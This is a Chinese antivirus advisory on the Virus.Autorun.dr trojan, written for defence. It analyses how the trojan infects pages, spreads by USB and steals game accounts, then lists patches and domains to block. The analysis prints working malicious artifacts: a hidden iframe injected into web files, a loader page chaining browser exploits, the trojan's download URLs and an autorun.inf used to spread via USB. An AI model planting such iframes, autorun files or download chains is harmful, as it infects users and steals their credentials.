网页收割者
网页收割者病毒名称:Virus.Autorun.dr
中 文 名:网页收割者
病毒类型:木马
危害等级:★★★
影响平台:Win 9X/ME/NT/2000/XP/2003
1. Virus.Autorun.dr 网页收割者病毒采用Delphi 工具编写,病毒运行后,会创建病毒进程:crsss.exe,该进程指向的路径为:%WinDir%System32crsss.exe,文件大小为 62512字节。
该病毒在注册表中添加下列启动项:[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 字串7
"crsss" = %WinDir%system32crsss.exe
这样,在Windows启动时,病毒就可以自动执行。
2. 该病毒还会搜索硬盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<IfrAmE src=http://mlcro-soft.cn/update.htm width=0 height=0></IfrAmE>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多恶意网址详细的分析如下:
update.htm 文件的内容下下:
<HTML>
<body style="CURSOR: url(wm/xjz2007.bmp)"></body>
<iframe width='100' height='100' src='wm/74.htm'></iframe>
<iframe width='100' height='100' src='wm/du2.htm'></iframe>
<iframe width='100' height='100' src='wm/1s.htm'></iframe>
<iframe width='100' height='100' src='wm/2s.htm'></iframe>
<iframe width='100' height='100' src='wm/3s.htm'></iframe>
该页面首先下载病毒文件xjz2007.bmp ,而该文件为病毒作者精心构造的ANI动态光标文件,利用Windows系统的MS07-017动态光标漏洞下载并且执行病毒文件http://down.851733.cn/down.exe
该病毒为QQ木马最新变种。
接着该页面又引用 74.htm,du2.htm,1s.htm,2s.htm,3s.htm 带毒页面。
其中74.htm页面利用微软MS07-004 矢量标记语言漏洞下载并执行病毒文件:http://www.851733.cn/htm/down.exe ,该病毒为木马代理病毒。
du2.htm 页面为一采用unescape算法加密的页面,解密后发现该页面利用的是“王朝超级搜霸ActiveX控件远程代码执行漏洞”下载并且执行病毒文件:http://www.mlcro-soft.com/Baidu.cab,而Baidu.cab 文件为一个压缩包,里面包含木马代理病毒。
1s.htm 和2s.htm页面都是采用VBScript 语言编写的页面,并且采用了10进制自定义函数方法加密,解密后发现该页面利用Windows系统的MS06-014漏洞下载并且执行病毒文件http://down.851733.cn/down.exe ,该病毒为QQ木马。
3s.htm 页面采用JavaScript语言编写,并经过16进制代码方法加密,解密后发现该页面利用Windows系统的MS06-014漏洞下载并且执行病毒文件http://down.851733.cn/down.exe,该病毒为QQ木马。
总体来看这些恶意网址页面是近期较为典型的网页木马方式,利用了MS06-014漏洞,MS07-017漏洞,MS07-004漏洞,以及新出现的王朝搜霸漏洞等网页木马常见用漏洞下载木马病毒。此外,从别的病毒来看,还有很多病毒利用PPStream 堆栈溢出漏洞和暴风影音II ActiveX栈溢出漏洞来传播木马病毒的。继使Windows系统漏洞后,使用常见应用程序漏洞进行下载木马病毒将会是以后网页木马发展的一个趋势。
3. 该病毒还会生成下载网游木马列表文件:%WinDir%system32c.txt ,该文件内容如下:
hxxp://down.851733.cn/1.exe
hxxp://down.851733.cn/2.exe
hxxp://down.851733.cn/3.exe
hxxp://down.851733.cn/4.exe
hxxp://down.851733.cn/5.exe
hxxp://down.851733.cn/6.exe
hxxp://down.851733.cn/7.exe
hxxp://down.851733.cn/8.exe
hxxp://down.851733.cn/9.exe
hxxp://down.851733.cn/10.exe
hxxp://down.851733.cn/11.exe
hxxp://down.851733.cn/12.exe
hxxp://down.851733.cn/13.exe
hxxp://down.851733.cn/14.exe
hxxp://down.851733.cn/15.exe
hxxp://down.851733.cn/16.exe
hxxp://down.851733.cn/17.exe
hxxp://down.851733.cn/18.exe
http://down.851733.cn/19.exe
http://down.851733.cn/20.exe
该病毒会将这些网游木马下载并且执行,从而盗取游戏玩家的帐号和密码,给玩家带来极大的损失。
4. 病毒还会通过U盘/MP3/移动硬盘的移动存储设备进行传播,在其中生成autorun.inf和niu.exe两个病毒文件,autorun.inf文件内容如下:
[AutoRun]
open=niu.exe
shellopen=打开(&O)
shellopenCommand=niu.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=niu.EXE
这样当用户在双击打开U盘的时候就会将病毒激活,从而感染到系统中。
5. 该病毒还会强行修改IE首页,将首页设置为http://mlcro-soft.cn/update.htm 带毒网站,这样用户一打开IE浏览器就会感染病毒。该病毒还会破坏操作系统的注册表相关键值,使系统无法显示隐藏文件。
解决方案:
1. 请将KV系列杀毒软件的病毒库升级到9月20日,并开启所有的实时监功能,即可拦截此病毒。
2. 建议用户通过Windows系统的Windows Update 功能更新操作系统补丁,尤其是一定要打上MS06-014漏洞,MS07-017漏洞,MS07-004漏洞等网页木马多用漏洞。
MS06-014 补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx
MS07-017 补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx
MS07-004 补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS07-004.mspx
3. 禁用系统的自动播放功能,防止病毒从U盘、MP3、移动硬盘等移动存储设备进入到计算机。 字串6
禁用Windows 系统的自动播放功能的方法:在运行中输入 gpedit.msc 后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。
4. 不要随意接收从QQ、MSN等即时聊天工具发送过来的可执行文件,不要登陆来历不明的网址连接。
5. 希望企业的网管使用防火墙或者上网行为管理设备对 mlcro-soft.cn 和 851733.cn 这两个网址进行屏蔽。
个系统漏洞下载并且执行20多个恶性网游木马,盗取游戏玩家的帐号和密码,给玩家带来极大的损失。
工程师戴收集!